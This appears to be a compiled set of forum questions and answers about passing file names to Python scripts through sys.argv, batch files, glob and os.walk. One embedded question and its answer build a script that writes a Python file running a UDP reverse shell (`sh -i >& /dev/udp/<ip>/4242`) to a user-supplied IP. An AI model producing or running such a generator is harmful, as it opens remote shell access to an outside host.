I have the Python script below, which takes a user input that is eventually used by the program to read a particular file.
I want to execute the Python program from a batch script and pass the file_name from the batch script. Can someone please help?
file_name = input("Input File Name to Compare: ")
path = ("outward\\" + file_name)
import sys
file_name = sys.argv[1]
path = "outward\\" + file_name
and you pass it to your script like:
$ python script.py filename.ext
To run the Python program from the batch script and pass the filename from the batch script to the Python program, you need to use sys.argv, so:
import sys
sys.argv is automatically a list of strings representing the arguments given on the command line. You can use it as input for your program; sys.argv[1] represents the first command-line argument (as a string) given to the script in question.
Lists are zero-indexed, so you can get individual items using the syntax [0]. sys.argv[0] is the script name itself, and the first argument after the script name, your filename, is at index 1, so:
file_name = sys.argv[1]
path = "outward\\" + file_name
Next you need to pass it to your script like this:
$ python your_script.py filename.ext
(where .ext stands for whatever extension your file actually has, for example .txt)
The complete code for the solution to the question is then simply:
import sys
file_name = sys.argv[1]
path = "outward\\" + file_name
and
$ python your_script.py filename.ext
You could use Python's sys.argv list.
The idea would be to get the input from the user in the batch file, then execute the Python program from the batch file while passing the user input as a command line argument to the python file. Example:
batchfile.bat
@echo off
set /p file="Enter Filename: "
python /path/to/program/pythonprogram.py %file%
pythonprogram.py
import sys
file_name = sys.argv[1]
path = ("outward\\" + file_name)
Now, when you execute the batch file, it will prompt for user input of a filename. Then, it will execute the Python program while passing the filename as a command-line argument to the Python file. You can then collect the argument from the sys.argv list.
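For completeness, a minimal sketch of what pythonprogram.py could then do with the argument, assuming the outward folder layout from the question:
import sys

file_name = sys.argv[1]          # filename passed in by the batch file
path = "outward\\" + file_name   # folder layout assumed from the question

with open(path) as f:            # open and read the chosen file
    contents = f.read()
print(contents)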
Related
I have code similar to this
ip = input("Enter IP: ")
I need to make it so that, after receiving the ip, it creates a new Python file with these commands:
import os
os.system('/bin/bash -c "setsid sh -i >& /dev/udp/"ip"/4242 0>&1"')
And instead of "ip" I need it to write ip that user entered
And second script shouldn't ask for input, it should take data from first
You could do it with the following script:
ip = input("Enter IP: ")
bash_script = f"/bin/bash -c 'setsid sh -i >& /dev/udp/{ip}/4242 0>&1'"
other_python_script = f"""
import os
os.system(\"""{bash_script}\""")
"""
with open("otherscript.py", "w") as python_script_file:
python_script_file.write(other_python_script)
Well, what is happening there?
First, I write the ip value into the string containing the bash script using an f-string and store it in bash_script.
Then, I use an f-string again to write bash_script inside the Python code string that will go into the new Python file. This string is stored in the other_python_script variable.
Lastly, I just write the python code string in a file called otherscript.py.
And you will have a python file with the code you want.
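For example, if the user entered 10.0.0.5 (an address chosen purely for illustration), the generated otherscript.py would contain roughly this:
import os
os.system("""/bin/bash -c 'setsid sh -i >& /dev/udp/10.0.0.5/4242 0>&1'""")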
You could do the first and second steps on the same line; I separated them into two lines of code for clarity. Also, this code only works in Python 3.6+; older versions should use other methods for writing values into strings, such as str.format().
Hopefully this helps; please let me know if you need anything below explained.
import os

path = yourPathHere  # insert your file path here, without the file name itself
ip = input('insert ip address here: ')  # this will contain the ip address

if not os.path.exists(path):  # check whether the path exists; if not,
    os.makedirs(path)         # create it

# this is a formatted string with the ip variable inside of it
pyFileContent = f'whatever/content/you/want/to/put/{ip}/whatever/else'

# create a string with the name of your .py file
filename = 'yourPythonFileNameHere' + '.py'

# join the path and filename, then create and open the file
with open(os.path.join(path, filename), 'w') as my_file:
    my_file.write(pyFileContent)  # write the content inside of it, then close
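If the first script should also launch the generated file right away (an assumption on my part; the question only says the second script must not prompt again), one way to do it, reusing path and filename from above:
import os

# run the freshly written script; the ip is already baked into it,
# so it will not ask for any input
os.system('python ' + os.path.join(path, filename))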
I have a non-Python program that I am running from Python using the os.system command, but I put this command inside a function. The program I want to run with os.system is supposed to give me an output file, and I need that output for processing; I also need that output to actually be written to the directory I am sending it to.
I wrote my function in the following general format:
def myFunction(infile):
    os.system('myProgram ' + infile + ' ' + outfileName)
    outfile = numpy.loadtxt(outfileName)
    return outfile
However, the output of myProgram (outfileName) isn't being written to my directory, so numpy can't load it. Is there a way to globally store the outputs of programs I run using os.system when the call is inside a function?
Assuming myProgram is working correctly, this is likely happening because myProgram does not know Python's working directory, so the file is simply being written somewhere else. Try using the full paths and see if that works.
Assuming infile and outfileName are relative paths in your current working directory, you could do:
def myFunction(infile):
    cmd = 'myProgram ' + os.path.join(os.getcwd(), infile)
    cmd += ' ' + os.path.join(os.getcwd(), outfileName)
    os.system(cmd)
    outfile = numpy.loadtxt(outfileName)
    return outfile
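As a further hedge against silent failures, here is an alternative sketch (not part of the answer above) that uses subprocess instead of os.system, so a non-zero exit status from myProgram raises an error instead of leaving you with a missing output file; passing outfileName as a parameter is my assumption:
import os
import subprocess
import numpy

def myFunction(infile, outfileName):
    # build absolute paths so myProgram writes where we expect
    infile_abs = os.path.abspath(infile)
    outfile_abs = os.path.abspath(outfileName)
    # check=True raises CalledProcessError if myProgram exits with an error
    subprocess.run(['myProgram', infile_abs, outfile_abs], check=True)
    return numpy.loadtxt(outfile_abs)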
I'm trying to practice Python scripting by writing a simple script that takes a large series of files named A_B and writes them to the location B\A. The way I was passing the arguments to the script was
python script.py *
and my program looks like
from sys import argv
import os
import ntpath
import shutil
script, filename = argv
target = open(filename)
outfilename = target.name.split('_')
outpath=outfilename[1]
outpath+="/"
outpath+=outfilename[0]
if not os.path.exists(outfilename[1]):
    os.makedirs(outfilename[1])
shutil.copyfile(target.name, outpath)
target.close()
The problem is that, the way it's currently written, this script only accepts one file at a time. Originally I was hoping the wildcard would pass one file at a time to the script and execute the script once for each file.
My question covers both cases:
How could I instead pass the wildcard-matched files one at a time to the script?
and
How do I modify this script to instead accept all the arguments? (I can handle list-ifying everything, but argv is what I'm having problems with, and I'm a bit unsure about how to create a list of files.)
You have two options, both of which involve a loop.
To pass the files one by one, use a shell loop:
for file in *; do python script.py "$file"; done
This will invoke your script once for every file matching the glob *.
To process multiple files in your script, use a loop there instead:
from sys import argv
for filename in argv[1:]:
    # rest of script
Then call your script from bash like python script.py * to pass all the files as arguments. argv[1:] is an array slice, which returns a list containing the elements from argv starting from position 1 to the end of the array.
I would suggest the latter approach as it means that you are only invoking one instance of your script.
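For illustration, a rough sketch of that second approach applied to your copy logic (same A_B naming assumption as your script, untested):
import os
import shutil
from sys import argv

for filename in argv[1:]:
    # "A_B" -> parts[0] = "A", parts[1] = "B"; copy A_B to B/A
    parts = os.path.basename(filename).split('_')
    outpath = os.path.join(parts[1], parts[0])
    if not os.path.exists(parts[1]):
        os.makedirs(parts[1])
    shutil.copyfile(filename, outpath)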
I have a shell script that does
find /tmp/test/* -name "*.json" -exec python /python/path {} \;
it looks for all the JSON files in specific directories and executes the OTHER Python script that I have.
How can I do this with Python scripting?
I'm not sure if I understood your question; if you are trying to execute a shell command from a Python script, you can use os.system():
import os
os.system('ls -l')
(see the complete documentation for os.system for details)
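Applied to your case, a minimal sketch would simply hand the exact find command from the question over to the shell (paths taken from the question):
import os

# run the same find/exec pipeline, just launched from Python
os.system('find /tmp/test/* -name "*.json" -exec python /python/path {} \\;')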
import glob, os, subprocess

for json_file in glob.glob("/home/tmp/*.json"):
    subprocess.Popen(["python", "/path/to/my.py", json_file], env=os.environ).communicate()
If you want to use Python instead of find, start with os.walk (official doc) to get the files. Once you have them (or as you them), act on them however you like.
From that page:
import os

for dirName, subdirList, fileList in os.walk(rootDir):
    print('Found directory: %s' % dirName)
    for fname in fileList:
        print('\t%s' % fname)
        # act on the file
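If you also want the *.json filtering that find gave you, here is a short sketch (my addition, not from the snippet above) combining os.walk with fnmatch and handing each match to the other script, with the paths taken from the question:
import fnmatch
import os
import subprocess

for dirName, subdirList, fileList in os.walk('/tmp/test'):
    for fname in fnmatch.filter(fileList, '*.json'):
        json_path = os.path.join(dirName, fname)
        # call the other script on each matching file, mirroring find -exec
        subprocess.call(['python', '/python/path', json_path])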
I guess you want to adjust your other python file /python/path/script.py, such that you only need this one file:
#!/usr/bin/env python
import sys
import glob
import os

#
# parse the command line arguments
#
for i, n in enumerate(sys.argv):
    # Debug output
    print("arg nr %02i: %s" % (i, n))
    # Store the args in variables
    # (0 is the filename of the script itself)
    if i == 1:
        path = sys.argv[1]     # the 1st arg is the path, like "/tmp/test"
    if i == 2:
        pattern = sys.argv[2]  # a pattern to match, like "'*.json'"

#
# merge path and pattern
# os.path makes it win / linux compatible ( / vs \ ...) and other stuff
#
fqps = os.path.join(path, pattern)

#
# Do something with your files
#
for filename in glob.glob(fqps):
    print(filename)
    # Do your stuff here with one file
    with open(filename, 'r') as f:  # 'r' = only read from the file ('w' = write)
        lines = f.readlines()
    # at this point, the file is closed again!
    for line in lines:
        print(line)
    # and so on ...
Then you can use the one script like this:
/python/path/script.py /tmp/test/ '*.json'. (Without needing to write python in front, thanks to the very first line, called the shebang. But you need to make it executable once, using chmod +x /python/path/script.py.)
Of course you can omit the 2nd arg and assign a default value to pattern, or only use one arg in the first place. I did it this way to demonstrate os.path.join() and the quoting of arguments that should not be expanded by bash (compare the effect of using '*.json' and *.json on the printed list of arguments at the start).
Here is some information about better / more sophisticated ways of handling command-line arguments.
And, as a bonus, using a main() function is advisable as well, to keep an overview if your script gets larger or is used by other Python scripts.
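A tiny sketch of that main() pattern, for reference:
import sys

def main(argv):
    # move the argument handling and the file loop from above in here
    print("got args: %s" % argv)

if __name__ == "__main__":
    main(sys.argv[1:])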
What you need is
find /tmp/test/* -name "*.json" -exec sh -c "python /python/path {}" \;
I have written a function for data processing and need to apply it to a large number of files in a directory.
The function works when applied to individual files.
def getfwhm(x):
    import numpy as np
    st = np.std(x[:,7])
    fwhm = 2*np.sqrt(2*np.log(2))*st
    file = open('all_fwhm2.txt', 'at')
    file.write("fwhm = %.6f\n" % (fwhm))
    file.close()
    file = open('all_fwhm2.txt', 'rt')
    print file.read()
    file.close()
I now want to use this on a larger scale. So far I have written this code:
import os
import fwhmfunction
files=os.listdir(".")
fwhmfunction.getfwhm(files)
But I get the following error
File "fwhmfunction.py", line 11, in getfwhm
st=np.std(x[:,7])
TypeError: list indices must be integers, not tuple
I am writing in Python using Spyder.
Thanks for your help!
In the spirit of Unix, you should separate the program into two parts:
the program which acts on the given file
the program which applies a given script to a given list of files (glob, or whatever)
So here's a sample of the first one:
# name: script.py
import sys
File = sys.argv[1]
# do something here
print File
(it is better to use argparse to parse the args, but we used argv to keep it simple)
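For reference, an argparse version of that small script might look like this (my sketch, not part of the original answer):
# name: script.py (argparse variant)
import argparse

parser = argparse.ArgumentParser(description="Act on a single given file")
parser.add_argument("infile", help="path of the file to process")
args = parser.parse_args()

# do something here
print(args.infile)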
As to the second part, there is an excellent unix tool already:
$ find . -maxdepth 1 -mindepth 1 -name "*.txt" | parallel python2.7 script.py {}
Here you get an extra bonus: parallel task execution.
If you are on Windows, then you can write something simple (sequential) in Python:
# name: apply_script_to_glob.py
import sys, os
from glob import glob
Script = sys.argv[1]
Glob = sys.argv[2]
Files = glob(Glob)
for File in Files:
    os.system("python2.7 " + Script + " " + File)
(Again, we didn't use argparse nor check anything, to keep it simple.) You'd call the script with:
$ python2.7 apply_script_to_glob.py "script.py" "*.txt"